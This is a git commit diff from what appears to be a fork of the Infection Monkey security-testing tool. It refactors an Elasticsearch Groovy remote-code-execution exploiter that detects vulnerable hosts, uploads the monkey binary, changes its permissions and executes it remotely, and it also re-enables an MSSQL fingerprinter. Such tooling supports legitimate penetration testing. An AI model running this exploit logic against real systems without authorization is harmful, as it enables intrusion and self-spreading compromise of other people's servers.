forked from p34709852/monkey
Refactored elastic for latest framework changes
This commit is contained in:
parent
a54eedec11
commit
76523e7379
|
@ -8,11 +8,9 @@ import json
|
|||
import logging
|
||||
import requests
|
||||
from network.elasticfinger import ES_SERVICE, ES_PORT
|
||||
from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth
|
||||
from exploit.web_rce import WebRCE
|
||||
from model import WGET_HTTP_UPLOAD, POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED
|
||||
from model import WGET_HTTP_UPLOAD
|
||||
|
||||
import copy
|
||||
import re
|
||||
|
||||
__author__ = 'danielg'
|
||||
|
@ -49,48 +47,42 @@ class ElasticGroovyExploiter(WebRCE):
|
|||
if ES_SERVICE not in self.host.services:
|
||||
LOG.info("Host: %s doesn't have ES open" % self.host.ip_addr)
|
||||
return False
|
||||
# We need a reference to the exploiter for WebRCE framework to use
|
||||
exploiter = self.exploit
|
||||
# Build url from host and elastic port(not https)
|
||||
urls = WebRCE.build_potential_urls(self.host, [[ES_PORT, False]], ['_search?pretty'])
|
||||
urls = self.build_potential_urls([[ES_PORT, False]], ['_search?pretty'])
|
||||
vulnerable_urls = []
|
||||
for url in urls:
|
||||
if WebRCE.check_if_exploitable(exploiter, url):
|
||||
if self.check_if_exploitable(url):
|
||||
vulnerable_urls.append(url)
|
||||
self._exploit_info['vulnerable_urls'] = vulnerable_urls
|
||||
if not vulnerable_urls:
|
||||
return False
|
||||
|
||||
# Extra escaping required:
|
||||
config = copy.deepcopy(self._config)
|
||||
config.dropper_target_path_win_32 = r"C:\\\\Windows\\\\monkey32.exe"
|
||||
config.dropper_target_path_win_64 = r"C:\\\\Windows\\\\monkey64.exe"
|
||||
|
||||
if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], config):
|
||||
if self.skip_exist and self.check_remote_files(vulnerable_urls[0]):
|
||||
LOG.info("Host %s was already infected under the current configuration, done" % self.host)
|
||||
return True
|
||||
|
||||
if not WebRCE.set_host_arch(self.host, exploiter, vulnerable_urls[0]):
|
||||
if not self.set_host_arch(vulnerable_urls[0]):
|
||||
return False
|
||||
|
||||
commands = {'windows': self.RDP_CMDLINE_HTTP,
|
||||
'linux': WGET_HTTP_UPLOAD}
|
||||
|
||||
data = WebRCE.upload_monkey(self.host, config, exploiter, vulnerable_urls[0], commands)
|
||||
data = self.upload_monkey(vulnerable_urls[0], commands)
|
||||
|
||||
# We can't use 'if not' because response may be ''
|
||||
if data is not False and data['response'] == False:
|
||||
if data is not False and data['response'] is False:
|
||||
return False
|
||||
|
||||
if WebRCE.change_permissions(self.host, vulnerable_urls[0], exploiter, data['path']) == False:
|
||||
if self.change_permissions(vulnerable_urls[0], data['path']) is False:
|
||||
return False
|
||||
|
||||
if WebRCE.execute_remote_monkey(self.host, vulnerable_urls[0], exploiter, data['path'], True) == False:
|
||||
if self.execute_remote_monkey(vulnerable_urls[0], data['path'], True) is False:
|
||||
return False
|
||||
|
||||
return True
|
||||
|
||||
def exploit(self, url, command):
|
||||
command = re.sub(r"\\", r"\\\\\\\\", command)
|
||||
payload = self.JAVA_CMD % command
|
||||
response = requests.get(url, data=payload)
|
||||
result = self.get_results(response)
|
||||
|
|
|
@ -29,8 +29,6 @@ class MSSQLFinger(HostFinger):
|
|||
Discovered server information written to the Host info struct.
|
||||
True if success, False otherwise.
|
||||
"""
|
||||
# TODO remove auto-return
|
||||
return False
|
||||
assert isinstance(host, VictimHost)
|
||||
|
||||
# Create a UDP socket and sets a timeout
|
||||
|
|
Loading…
Reference in New Issue